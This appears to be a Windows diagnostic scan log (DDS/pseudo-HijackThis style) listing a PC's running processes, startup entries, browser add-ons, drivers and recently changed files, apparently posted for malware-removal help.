C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamscheduler.exe
C:\Program Files\Lenovo\Lenovo Slim USB Keyboard\Sks8821.exe
C:\Program Files (x86)\Common Files\Ulead Systems\DVD\ULCDRSvr.exe
C:\WINDOWS\system32\svchost.exe -k appmodel
C:\WINDOWS\system32\svchost.exe -k imgsvc
C:\Program Files (x86)\Edimax\Edimax Wireless LAN\WPSService20.exe
C:\Program Files (x86)\Spybot - Search & Destroy 2\SDUpdSvc.exe
C:\Program Files (x86)\Spybot - Search & Destroy 2\SDFSSvc.exe
C:\Program Files (x86)\Spybot - Search & Destroy 2\SDWSCSvc.exe
C:\WINDOWS\system32\SearchIndexer.exe
C:\WINDOWS\system32\svchost.exe -k NetworkServiceNetworkRestricted
C:\WINDOWS\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe
C:\WINDOWS\system32\wbem\wmiprvse.exe
C:\Program Files (x86)\AVG\Av\avgnsa.exe
C:\Program Files (x86)\AVG\Av\avgemca.exe
C:\Program Files (x86)\AVG\Av\avgrsa.exe
C:\WINDOWS\Microsoft.Net\Framework64\v3.0\WPF\PresentationFontCache.exe
C:\Program Files\iPod\bin\iPodService.exe
C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\LMS.exe
C:\Program Files (x86)\Symantec\VIP Access Client\VIPAppService.exe
C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\UNS\UNS.exe
C:\WINDOWS\System32\dwm.exe
C:\Program Files (x86)\Malwarebytes Anti-Malware\mbam.exe
C:\WINDOWS\system32\sihost.exe
C:\WINDOWS\system32\svchost.exe -k UnistackSvcGroup
C:\WINDOWS\system32\taskhostw.exe
C:\Windows\System32\RuntimeBroker.exe
C:\WINDOWS\Explorer.EXE
C:\WINDOWS\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe
C:\Program Files (x86)\Trusteer\Rapport\bin\RapportService.exe
C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.9.261.0_x64__kzf8qxf38zg5c\SkypeHost.exe
C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
C:\Program Files (x86)\Mozilla Firefox\firefox.exe
C:\Program Files\Lenovo\Lenovo Slim USB Keyboard\Skd8821.exe
C:\Program Files\iTunes\iTunesHelper.exe
C:\Users\theun\AppData\Local\Microsoft\OneDrive\OneDrive.exe
C:\Program Files\Lenovo\Lenovo Slim USB Keyboard\Skdh8821.exe
C:\Program Files (x86)\Intel\IntelAppStore\bin\ismagent.exe
C:\Users\theun\AppData\Local\Microsoft\OneDrive\OneDrive.exe
C:\Program Files (x86)\AVG\Av\avgui.exe
C:\Program Files (x86)\Spybot - Search & Destroy 2\SDTray.exe
C:\Program Files (x86)\AVG\Framework\Common\avguix.exe
C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
C:\Program Files (x86)\Mozilla Firefox\firefox.exe
C:\Program Files\CCleaner\CCleaner64.exe
C:\WINDOWS\system32\ApplicationFrameHost.exe
C:\WINDOWS\System32\fontdrvhost.exe
C:\WINDOWS\system32\ctfmon.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\WINDOWS\system32\SettingSyncHost.exe
C:\Program Files (x86)\AVG\Av\avgcsrva.exe
C:\WINDOWS\system32\taskhostw.exe
C:\WINDOWS\system32\NOTEPAD.EXE
C:\WINDOWS\system32\notepad.exe
C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1611.3123.0_x64__8wekyb3d8bbwe\Calculator.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Program Files\WindowsApps\Microsoft.WindowsStore_11610.1001.10.0_x64__8wekyb3d8bbwe\WinStore.App.exe
C:\WINDOWS\ImmersiveControlPanel\SystemSettings.exe
C:\WINDOWS\system32\AUDIODG.EXE
C:\Windows\System32\SystemSettingsBroker.exe
C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\WINDOWS\SysWoW64\NOTEPAD.EXE
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\WINDOWS\system32\SearchProtocolHost.exe
C:\Windows\System32\smartscreen.exe
C:\WINDOWS\System32\cscript.exe
.
============== Pseudo HJT Report ===============
.
BHO: Lync Browser Helper: {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} - C:\Program Files (x86)\Microsoft Office\root\Office16\OCHelper.dll
BHO: Java(tm) Plug-In SSV Helper: {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files (x86)\Java\jre1.8.0_111\bin\ssv.dll
BHO: Symantec VIP Access Add-On: {C63CD127-A1CB-4D49-A4F7-D6F88A917BE6} - C:\Program Files (x86)\Symantec\VIP Access Client\VIPAddOnForIE.dll
BHO: Microsoft OneDrive for Business Browser Helper: {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} - C:\Program Files (x86)\Microsoft Office\root\Office16\GROOVEEX.DLL
BHO: Java(tm) Plug-In 2 SSV Helper: {DBC80044-A445-435b-BC74-9C25C1C588A9} - C:\Program Files (x86)\Java\jre1.8.0_111\bin\jp2ssv.dll
uRun: [OneDrive] "C:\Users\theun\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background
uRun: [CCleaner Monitoring] "C:\Program Files\CCleaner\CCleaner64.exe" /MONITOR
mRun: [Intel AppUp(SM) center] "C:\Program Files (x86)\Intel\IntelAppStore\bin\ismagent.exe" --domain-id F0399437-FD0C-4A48-B101-F0314A6172E4
mRun: [EE Prosumer ModemListener] C:\Program Files (x86)\Web Connection\Y854\BackgroundService\ModemListener.exe start
mRun: [AVG_UI] "C:\Program Files (x86)\AVG\Framework\Common\avguirna.exe" /lps=av
mRun: [SDTray] "C:\Program Files (x86)\Spybot - Search & Destroy 2\SDTray.exe"
mRun: [AvgUi] "C:\Program Files (x86)\AVG\Framework\Common\avguirna.exe" /lps=fmw
mRun: [SunJavaUpdateSched] "C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe"
mPolicies-System: DSCAutomationHostEnabled = dword:2
IE: E&xport to Microsoft Excel - C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE/3000
IE: Se&nd to OneNote - C:\Program Files (x86)\Microsoft Office\Root\Office16\ONBttnIE.dll/105
IE: {219C3416-8CB2-491a-A3C7-D9FCDDC9D600} - {5F7B1267-94A9-47F5-98DB-E99415F33AEC} - C:\Program Files (x86)\Windows Live\Writer\WriterBrowserExtension.dll
IE: {22CC3EBD-C286-43aa-B8E6-06B115F74162} - C:\Program Files (x86)\Hewlett-Packard\Smart Print 2.0\smartprintsetup.exe
IE: {2670000A-7350-4f3c-8081-5663EE0C6C49} - {48E73304-E1D6-4330-914C-F5F514E3486C} - C:\Program Files (x86)\Microsoft Office\root\Office16\ONBttnIE.dll
IE: {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} - {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} - C:\Program Files (x86)\Microsoft Office\root\Office16\OCHelper.dll
IE: {789FE86F-6FC4-46A1-9849-EDE0DB0C95CA} - {FFFDC614-B694-4AE6-AB38-5D6374584B52} - C:\Program Files (x86)\Microsoft Office\root\Office16\ONBttnIELinkedNotes.dll
IE: {A95fe080-8f5d-11d2-a20b-00aa003c157a} - C:\Program Files (x86)\Evernote\Evernote\EvernoteIE.dll/204
.
INFO: HKCU has more than 50 listed domains.
If you wish to scan all of them, select the 'Force scan all domains' option.
.
.
INFO: HKLM has more than 50 listed domains.
If you wish to scan all of them, select the 'Force scan all domains' option.
.
TCP: NameServer = 192.168.1.1
TCP: Interfaces\{0E13DCB2-D079-49C7-AD08-DB4B89350786} : DHCPNameServer = 192.168.1.1 192.168.1.1
TCP: Interfaces\{12c77793-624f-40c6-98fb-26cdf5780080} : DHCPNameServer = 192.168.1.1
TCP: Interfaces\{3ed23349-6bc2-4068-805c-2c152fc1ab09} : DHCPNameServer = 192.168.1.1
TCP: Interfaces\{94eafdf7-98ab-42b6-84cc-2dbd2e4bf9cd} : DHCPNameServer = 172.20.10.1
Handler: mso-minsb-roaming.16 - {83C25742-A9F7-49FB-9138-434302C88D07} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL
Handler: mso-minsb.16 - {42089D2D-912D-4018-9087-2B87803E93FB} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL
Handler: osf-roaming.16 - {42089D2D-912D-4018-9087-2B87803E93FB} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL
Handler: osf.16 - {5504BE45-A83B-4808-900A-3A5C36E7F77A} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL
Handler: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\Program Files (x86)\Common Files\Skype\Skype4COM.dll
Handler: tbauth - {14654CA6-5711-491D-B89A-58E571679951} - C:\Windows\SysWOW64\tbauth.dll
Handler: windows.tbauth - {14654CA6-5711-491D-B89A-58E571679951} - C:\Windows\SysWOW64\tbauth.dll
Handler: wlpg - {E43EF6CD-A37A-4A9B-9E6F-83F89B8E6324} - C:\Program Files (x86)\Windows Live\Photo Gallery\AlbumDownloadProtocolHandler.dll
Notify: SDWinLogon - SDWinLogon.dll
SSODL: WebCheck - <orphaned>
mASetup: {8A69D345-D564-463c-AFF1-A69D9E530F96} - "C:\Program Files (x86)\Google\Chrome\Application\54.0.2840.99\Installer\chrmstp.exe" --configure-user-settings --verbose-logging --system-level --multi-install --chrome
CLSID: {603D3801-BD81-11d0-A3A5-00C04FD706EC} - C:\WINDOWS\System32\windows.storage.dll
x64-mStart Page = about:blank
x64-mSearch Page = about:blank
x64-mDefault_Search_URL = about:blank
x64-BHO: Lync Browser Helper: {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} - C:\Program Files (x86)\Microsoft Office\root\VFS\ProgramFilesX64\Microsoft Office\Office16\OCHelper.dll
x64-BHO: AVG Web TuneUp: {95B7759C-8C7F-4BF1-B163-73684A933233} -
x64-BHO: Symantec VIP Access Add-On: {C63CD127-A1CB-4D49-A4F7-D6F88A917BE6} - C:\Program Files (x86)\Symantec\VIP Access Client\64bit\VIPAddOnForIE64.dll
x64-BHO: Microsoft OneDrive for Business Browser Helper: {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} - C:\Program Files (x86)\Microsoft Office\root\VFS\ProgramFilesX64\Microsoft Office\Office16\GROOVEEX.DLL
x64-Run: [RTHDVCPL] C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe -s
x64-Run: [Skd8821] C:\Program Files\Lenovo\Lenovo Slim USB Keyboard\Skd8821.exe
x64-Run: [iTunesHelper] "C:\Program Files\iTunes\iTunesHelper.exe"
x64-mPolicies-System: DSCAutomationHostEnabled = dword:2
x64-IE: {2670000A-7350-4f3c-8081-5663EE0C6C49} - {48E73304-E1D6-4330-914C-F5F514E3486C} - C:\Program Files (x86)\Microsoft Office\root\VFS\ProgramFilesX64\Microsoft Office\Office16\ONBttnIE.dll
x64-IE: {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} - {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} - C:\Program Files (x86)\Microsoft Office\root\VFS\ProgramFilesX64\Microsoft Office\Office16\OCHelper.dll
x64-IE: {789FE86F-6FC4-46A1-9849-EDE0DB0C95CA} - {FFFDC614-B694-4AE6-AB38-5D6374584B52} - C:\Program Files (x86)\Microsoft Office\root\VFS\ProgramFilesX64\Microsoft Office\Office16\ONBttnIELinkedNotes.dll
.
INFO: x64-HKLM has more than 50 listed domains.
If you wish to scan all of them, select the 'Force scan all domains' option.
.
x64-Handler: mso-minsb-roaming.16 - {83C25742-A9F7-49FB-9138-434302C88D07} - <orphaned>
x64-Handler: mso-minsb.16 - {42089D2D-912D-4018-9087-2B87803E93FB} - <orphaned>
x64-Handler: osf-roaming.16 - {42089D2D-912D-4018-9087-2B87803E93FB} - <orphaned>
x64-Handler: osf.16 - {5504BE45-A83B-4808-900A-3A5C36E7F77A} - <orphaned>
x64-Handler: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - <orphaned>
x64-Handler: tbauth - {14654CA6-5711-491D-B89A-58E571679951} - C:\WINDOWS\System32\tbauth.dll
x64-Handler: windows.tbauth - {14654CA6-5711-491D-B89A-58E571679951} - C:\WINDOWS\System32\tbauth.dll
x64-Handler: wlpg - {E43EF6CD-A37A-4A9B-9E6F-83F89B8E6324} - <orphaned>
x64-Notify: igfxcui - igfxdev.dll
x64-SSODL: WebCheck - <orphaned>
x64-mASetup: {2C7339CF-2B09-4501-B3F3-F3508C9228ED} - /UserInstall
x64-mASetup: {89820200-ECBD-11cf-8B85-00AA005B4340} - U
x64-CLSID: {603D3801-BD81-11d0-A3A5-00C04FD706EC} - C:\WINDOWS\System32\windows.storage.dll
Hosts: 127.0.0.1 www.spywareinfo.com
.
================= FIREFOX ===================
.
FF - ProfilePath - C:\Users\theun\AppData\Roaming\Mozilla\Firefox\Profiles\rr1ognzc.default-1480128198913\
FF - prefs.js: browser.startup.homepage - outlook.com/
FF - plugin: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AIR\nppdf32.dll
FF - plugin: C:\Program Files (x86)\Google\Update\1.3.31.5\npGoogleUpdate3.dll
FF - plugin: C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIIPT.dll
FF - plugin: C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIUpdater.dll
FF - plugin: C:\Program Files (x86)\Java\jre1.8.0_111\bin\dtplugin\npdeployJava1.dll
FF - plugin: C:\Program Files (x86)\Java\jre1.8.0_111\bin\plugin2\npjp2.dll
FF - plugin: C:\Program Files (x86)\Microsoft Office\root\Office16\NPSPWRAP.DLL
FF - plugin: C:\Program Files (x86)\Microsoft Office\root\VFS\ProgramFilesX86\Mozilla Firefox\plugins\npMeetingJoinPluginOC.dll
FF - plugin: c:\Program Files (x86)\Microsoft Silverlight\5.1.50901.0\npctrlui.dll
FF - plugin: C:\Program Files (x86)\Mozilla Firefox\browser\plugins\npatgpc.dll
FF - plugin: C:\Program Files (x86)\Nitro PDF\Professional 7\npdf.dll
FF - plugin: C:\Program Files (x86)\Nitro PDF\Professional 7\npnitroie.dll
FF - plugin: C:\Program Files (x86)\Nitro PDF\Professional 7\npnitromozilla.dll
FF - plugin: C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll
FF - plugin: C:\WINDOWS\SysWOW64\Adobe\Director\np32dsw_1225195.dll
FF - plugin: C:\WINDOWS\SysWoW64\Macromed\Flash\NPSWF32_23_0_0_207.dll
.
============= SERVICES / DRIVERS ===============
.
R0 AVGIDSHA;AVGIDSHA;C:\WINDOWS\System32\drivers\avgidsha.sys [2016-6-1 267008]
R0 Avgloga;AVG Logging Driver;C:\WINDOWS\System32\drivers\avgloga.sys [2016-2-16 360736]
R0 Avgmfx64;AVG Mini-Filter Resident Anti-Virus Shield;C:\WINDOWS\System32\drivers\avgmfx64.sys [2016-9-26 254208]
R0 Avgrkx64;AVG Anti-Rootkit Driver;C:\WINDOWS\System32\drivers\avgrkx64.sys [2016-6-1 52992]
R0 Avguniva;AVG Universal Driver;C:\WINDOWS\System32\drivers\avguniva.sys [2016-6-1 77056]
R0 intelpep;Intel(R) Power Engine Plug-in Driver;C:\WINDOWS\System32\drivers\intelpep.sys [2016-7-16 48152]
R0 iorate;iorate;C:\WINDOWS\System32\drivers\iorate.sys [2016-11-8 48992]
R1 ahcache;Application Compatibility Cache;C:\WINDOWS\System32\drivers\ahcache.sys [2016-10-28 227328]
R1 Avgdiska;AVG Disk Driver;C:\WINDOWS\System32\drivers\avgdiska.sys [2016-5-13 163072]
R1 AVGIDSDriver;AVGIDSDriver;C:\WINDOWS\System32\drivers\avgidsdrivera.sys [2016-10-17 312576]
R1 Avgldx64;AVG AVI Loader Driver;C:\WINDOWS\System32\drivers\avgldx64.sys [2016-10-19 267520]
R1 avgtp;avgtp;C:\WINDOWS\System32\drivers\avgtpx64.sys [2013-9-10 46368]
R1 Avgwfpa;AVG Firewall Driver;C:\WINDOWS\System32\drivers\avgwfpa.sys [2016-8-4 313096]
R1 FileCrypt;FileCrypt;C:\WINDOWS\System32\drivers\filecrypt.sys [2016-7-16 88576]
R1 GpuEnergyDrv;GPU Energy Driver;C:\WINDOWS\System32\drivers\gpuenergydrv.sys [2016-7-16 8192]
R2 clreg;Virtual Registry for Containers;C:\WINDOWS\System32\drivers\registry.sys [2016-7-16 70144]
R3 iwdbus;IWD Bus Enumerator;C:\WINDOWS\System32\drivers\iwdbus.sys [2015-12-1 38896]
R3 MBAMProtector;MBAMProtector;C:\WINDOWS\System32\drivers\mbam.sys [2013-9-10 27008]
R3 MBAMWebAccessControl;MBAMWebAccessControl;C:\WINDOWS\System32\drivers\mwac.sys [2015-2-23 65408]
S0 Avgboota;AVG Early Launch Anti-Malware Driver;C:\WINDOWS\System32\drivers\avgboota.sys [2016-1-7 21632]
S3 AcpiDev;ACPI Devices driver;C:\WINDOWS\System32\drivers\AcpiDev.sys [2016-7-16 18432]
S3 ADP80XX;ADP80XX;C:\WINDOWS\System32\drivers\adp80xx.sys [2016-7-16 1135456]
S3 applockerfltr;Smartlocker Filter Driver;C:\WINDOWS\System32\drivers\applockerfltr.sys [2016-7-16 15360]
S3 AppvStrm;AppvStrm;C:\WINDOWS\System32\drivers\AppVStrm.sys [2016-9-30 127328]
S3 AppvVemgr;AppvVemgr;C:\WINDOWS\System32\drivers\AppvVemgr.sys [2016-7-16 157024]
S3 AppvVfs;AppvVfs;C:\WINDOWS\System32\drivers\AppvVfs.sys [2016-7-16 141152]
S3 bcmfn;bcmfn Service;C:\WINDOWS\System32\drivers\bcmfn.sys [2016-7-16 9728]
S3 bcmfn2;bcmfn2 Service;C:\WINDOWS\System32\drivers\bcmfn2.sys [2016-7-16 9728]
S3 buttonconverter;Service for Portable Device Control devices;C:\WINDOWS\System32\drivers\buttonconverter.sys [2016-7-16 38912]
S3 CapImg;HID driver for CapImg touch screen;C:\WINDOWS\System32\drivers\capimg.sys [2016-10-28 118272]
S3 cht4iscsi;cht4iscsi;C:\WINDOWS\System32\drivers\cht4sx64.sys [2016-7-16 346976]
S3 cht4vbd;Chelsio Virtual Bus Driver;C:\WINDOWS\System32\drivers\cht4vx64.sys [2016-7-16 2104160]
S3 genericusbfn;Generic USB Function Class;C:\WINDOWS\System32\drivers\genericusbfn.sys [2016-7-16 20480]
S3 hidinterrupt;Common Driver for HID Buttons implemented with interrupts;C:\WINDOWS\System32\drivers\hidinterrupt.sys [2016-7-16 50016]
S3 hitmanpro37;HitmanPro 3.7 Support Driver;C:\WINDOWS\System32\drivers\hitmanpro37.sys [2016-11-25 54736]
S3 iagpio;Intel Serial IO GPIO Controller Driver;C:\WINDOWS\System32\drivers\iagpio.sys [2016-7-16 33280]
S3 iai2c;Intel(R) Serial IO I2C Host Controller;C:\WINDOWS\System32\drivers\iai2c.sys [2016-7-16 81408]
S3 iaLPSS2i_GPIO2;Intel(R) Serial IO GPIO Driver v2;C:\WINDOWS\System32\drivers\iaLPSS2i_GPIO2.sys [2016-7-16 64512]
S3 iaLPSS2i_I2C;Intel(R) Serial IO I2C Driver v2;C:\WINDOWS\System32\drivers\iaLPSS2i_I2C.sys [2016-7-16 176384]
S3 iaLPSSi_GPIO;Intel(R) Serial IO GPIO Controller Driver;C:\WINDOWS\System32\drivers\iaLPSSi_GPIO.sys [2016-7-16 38128]
S3 iaLPSSi_I2C;Intel(R) Serial IO I2C Controller Driver;C:\WINDOWS\System32\drivers\iaLPSSi_I2C.sys [2016-7-16 113152]
S3 iaStorAV;Intel(R) SATA RAID Controller Windows;C:\WINDOWS\System32\drivers\iaStorAV.sys [2016-7-16 673120]
S3 ibbus;Mellanox InfiniBand Bus/AL (Filter Driver);C:\WINDOWS\System32\drivers\ibbus.sys [2016-7-16 526176]
S3 IndirectKmd;Indirect Displays Kernel-Mode Driver;C:\WINDOWS\System32\drivers\IndirectKmd.sys [2016-7-16 35840]
S3 intaud_WaveExtensible;Intel WiDi Audio Device;C:\WINDOWS\System32\drivers\intelaud.sys [2015-12-1 50160]
S3 LSI_SAS2i;LSI_SAS2i;C:\WINDOWS\System32\drivers\lsi_sas2i.sys [2016-7-16 105824]
S3 LSI_SAS3i;LSI_SAS3i;C:\WINDOWS\System32\drivers\lsi_sas3i.sys [2016-7-16 101216]
S3 megasas2i;megasas2i;C:\WINDOWS\System32\drivers\MegaSas2i.sys [2016-10-11 64352]
S3 mlx4_bus;Mellanox ConnectX Bus Enumerator;C:\WINDOWS\System32\drivers\mlx4_bus.sys [2016-7-16 842584]
.
=============== Created Last 30 ================
.
2016-11-26 03:34:41 203680 ----a-w- C:\WINDOWS\System32\drivers\zam64.sys
2016-11-26 03:34:38 203680 ----a-w- C:\WINDOWS\System32\drivers\zamguard64.sys
2016-11-26 03:34:36 -------- d-----w- C:\Users\theun\AppData\Local\Zemana
2016-11-25 23:53:18 -------- d-----w- C:\Users\theun\AppData\Roaming\TeamViewer
2016-11-25 04:18:20 -------- d--h--w- C:\OneDriveTemp
2016-11-25 03:35:23 54736 ----a-w- C:\WINDOWS\System32\drivers\hitmanpro37.sys
2016-11-25 03:35:00 -------- d-----w- C:\ProgramData\HitmanPro
2016-11-25 03:31:04 -------- d-----w- C:\AdwCleaner
2016-11-25 01:28:25 -------- d-----w- C:\Users\theun\AppData\Local\Programs
2016-11-23 23:41:33 -------- d-----w- C:\Users\theun\AppData\Local\LogMeIn Rescue Applet
2016-11-18 14:31:22 41928 ----a-w- C:\Program Files (x86)\Mozilla Firefox\IA2Marshal.dll
2016-11-10 16:10:07 -------- d-----w- C:\Program Files\iPod
2016-11-10 16:09:42 -------- d---a-w- C:\Program Files\iTunes
2016-11-08 21:45:55 65536 ----a-w- C:\WINDOWS\SysWow64\wininetlui.dll
2016-11-08 21:44:59 3892352 ----a-w- C:\WINDOWS\SysWow64\mfcore.dll
2016-11-08 21:33:09 2104320 ----a-w- C:\WINDOWS\System32\wlidsvc.dll
2016-11-08 21:31:59 659968 ----a-w- C:\Program Files\Windows NT\TableTextService\TableTextService.dll
2016-11-08 21:30:57 4130432 ----a-w- C:\WINDOWS\System32\mfcore.dll
2016-11-08 21:28:55 942080 ----a-w- C:\WINDOWS\System32\audiosrv.dll
2016-11-08 21:27:57 714592 ----a-w- C:\WINDOWS\System32\drivers\vhdmp.sys
2016-10-30 07:28:00 29432 ----a-w- C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE16\Office Setup Controller\pkeyconfig.companion.dll
2016-10-30 07:25:36 380192 ----a-w- C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE16\LICLUA.EXE
2016-10-30 07:18:24 209104 ----a-w- C:\Program Files (x86)\Common Files\Microsoft Shared\Source Engine\OSE.EXE
2016-10-28 14:17:08 498952 ----a-w- C:\WINDOWS\System32\DolbyDecMFT.dll
2016-10-28 14:17:08 1557808 ----a-w- C:\WINDOWS\SysWow64\winmde.dll
2016-10-28 14:17:08 1472536 ----a-w- C:\WINDOWS\System32\mfplat.dll
2016-10-28 14:17:07 1990648 ----a-w- C:\WINDOWS\System32\mfmp4srcsnk.dll
2016-10-28 14:17:05 6285312 ----a-w- C:\WINDOWS\System32\Windows.Media.dll
2016-10-28 14:17:04 244816 ----a-w- C:\WINDOWS\System32\mfps.dll
2016-10-28 14:17:03 147456 ----a-w- C:\WINDOWS\System32\winsrv.dll
2016-10-28 14:15:58 619368 ----a-w- C:\WINDOWS\System32\drivers\cng.sys
.
==================== Find3M ====================
.
2016-11-27 00:55:52 192216 ----a-w- C:\WINDOWS\System32\drivers\MBAMSwissArmy.sys
2016-11-02 12:01:41 315744 ----a-w- C:\WINDOWS\SysWow64\atmfd.dll
2016-11-02 12:01:37 484584 ----a-w- C:\WINDOWS\SysWow64\AudioSes.dll
2016-11-02 11:22:59 601712 ----a-w- C:\WINDOWS\SysWow64\oleaut32.dll
2016-11-02 11:22:59 1570672 ----a-w- C:\WINDOWS\SysWow64\ntdll.dll
2016-11-02 11:20:37 590960 ----a-w- C:\WINDOWS\System32\AudioSes.dll
2016-11-02 11:20:36 378720 ----a-w- C:\WINDOWS\System32\atmfd.dll
2016-11-02 11:15:35 1051112 ----a-w- C:\WINDOWS\System32\winresume.efi
2016-11-02 11:15:33 894096 ----a-w- C:\WINDOWS\System32\winresume.exe
2016-11-02 11:14:00 7816544 ----a-w- C:\WINDOWS\System32\ntoskrnl.exe
2016-11-02 11:13:51 1354320 ----a-w- C:\WINDOWS\System32\winload.efi
2016-11-02 11:13:51 1173496 ----a-w- C:\WINDOWS\System32\winload.exe
2016-11-02 11:13:47 1883784 ----a-w- C:\WINDOWS\System32\ntdll.dll
2016-11-02 11:13:43 773720 ----a-w- C:\WINDOWS\System32\oleaut32.dll
2016-11-02 11:13:36 423776 ----a-w- C:\WINDOWS\System32\wifitask.exe
2016-11-02 11:12:57 341344 ----a-w- C:\WINDOWS\SysWow64\msv1_0.dll
2016-11-02 11:12:35 2255712 ----a-w- C:\WINDOWS\System32\drivers\ntfs.sys
2016-11-02 11:12:07 376672 ----a-w- C:\WINDOWS\System32\drivers\clfs.sys
2016-11-02 11:10:44 2323728 ----a-w- C:\WINDOWS\SysWow64\d3d10warp.dll
2016-11-02 11:08:52 576408 ----a-w- C:\WINDOWS\SysWow64\wer.dll
2016-11-02 11:08:43 186424 ----a-w- C:\WINDOWS\SysWow64\weretw.dll
2016-11-02 11:08:01 111968 ----a-w- C:\WINDOWS\SysWow64\NetSetupApi.dll
2016-11-02 11:08:00 602464 ----a-w- C:\WINDOWS\SysWow64\NetSetupEngine.dll
2016-11-02 11:05:53 6657176 ----a-w- C:\WINDOWS\SysWow64\Windows.Media.Protection.PlayReady.dll
2016-11-02 11:05:40 951904 ----a-w- C:\WINDOWS\SysWow64\mfsvr.dll
2016-11-02 11:05:29 405856 ----a-w- C:\WINDOWS\System32\msv1_0.dll
2016-11-02 11:05:13 959112 ----a-w- C:\WINDOWS\SysWow64\ole32.dll
2016-11-02 11:04:46 596832 ----a-w- C:\WINDOWS\SysWow64\comctl32.dll
2016-11-02 11:04:36 4312248 ----a-w- C:\WINDOWS\SysWow64\explorer.exe
2016-11-02 11:04:08 2678056 ----a-w- C:\WINDOWS\System32\d3d10warp.dll
2016-11-02 11:02:55 682816 ----a-w- C:\WINDOWS\System32\wer.dll
2016-11-02 11:02:53 238056 ----a-w- C:\WINDOWS\System32\weretw.dll
2016-11-02 11:02:31 848736 ----a-w- C:\WINDOWS\System32\NetSetupEngine.dll
2016-11-02 11:02:31 148832 ----a-w- C:\WINDOWS\System32\NetSetupApi.dll
2016-11-02 11:01:37 1425000 ----a-w- C:\WINDOWS\SysWow64\d3d9.dll
2016-11-02 11:01:31 276832 ----a-w- C:\WINDOWS\SysWow64\input.dll
2016-11-02 11:01:30 1415744 ----a-w- C:\WINDOWS\SysWow64\gdi32full.dll
2016-11-02 11:01:28 545936 ----a-w- C:\WINDOWS\SysWow64\fontdrvhost.exe
2016-11-02 11:01:20 1263856 ----a-w- C:\WINDOWS\SysWow64\msctf.dll
2016-11-02 11:01:00 92512 ----a-w- C:\WINDOWS\System32\rdpudd.dll
2016-11-02 11:00:30 8156080 ----a-w- C:\WINDOWS\System32\Windows.Media.Protection.PlayReady.dll
2016-11-02 11:00:17 534096 ----a-w- C:\WINDOWS\System32\AudioEng.dll
2016-11-02 11:00:17 1061968 ----a-w- C:\WINDOWS\System32\mfsvr.dll
2016-11-02 11:00:06 1274712 ----a-w- C:\WINDOWS\System32\ole32.dll
2016-11-02 10:59:45 4673304 ----a-w- C:\WINDOWS\explorer.exe
2016-11-02 10:56:52 1609920 ----a-w- C:\WINDOWS\System32\d3d9.dll
2016-11-02 10:56:50 322912 ----a-w- C:\WINDOWS\System32\input.dll
2016-11-02 10:56:42 1572768 ----a-w- C:\WINDOWS\System32\gdi32full.dll
2016-11-02 10:56:39 628552 ----a-w- C:\WINDOWS\System32\fontdrvhost.exe
2016-11-02 10:56:38 1418312 ----a-w- C:\WINDOWS\System32\msctf.dll
2016-11-02 10:55:52 48992 ----a-w- C:\WINDOWS\System32\drivers\iorate.sys
2016-11-02 10:50:35 34304 ----a-w- C:\WINDOWS\SysWow64\LaunchWinApp.exe
2016-11-02 10:49:47 37376 ----a-w- C:\WINDOWS\SysWow64\atmlib.dll
2016-11-02 10:49:42 147968 ----a-w- C:\WINDOWS\SysWow64\win32k.sys
2016-11-02 10:49:20 32768 ----a-w- C:\WINDOWS\apppatch\AcWinRT.dll
2016-11-02 10:48:56 32768 ----a-w- C:\WINDOWS\SysWow64\efsext.dll
2016-11-02 10:48:24 88064 ----a-w- C:\WINDOWS\apppatch\AcXtrnal.dll
2016-11-02 10:48:00 95232 ----a-w- C:\WINDOWS\SysWow64\TSpkg.dll
2016-11-02 10:47:36 156672 ----a-w- C:\WINDOWS\SysWow64\BcastDVRHelper.dll
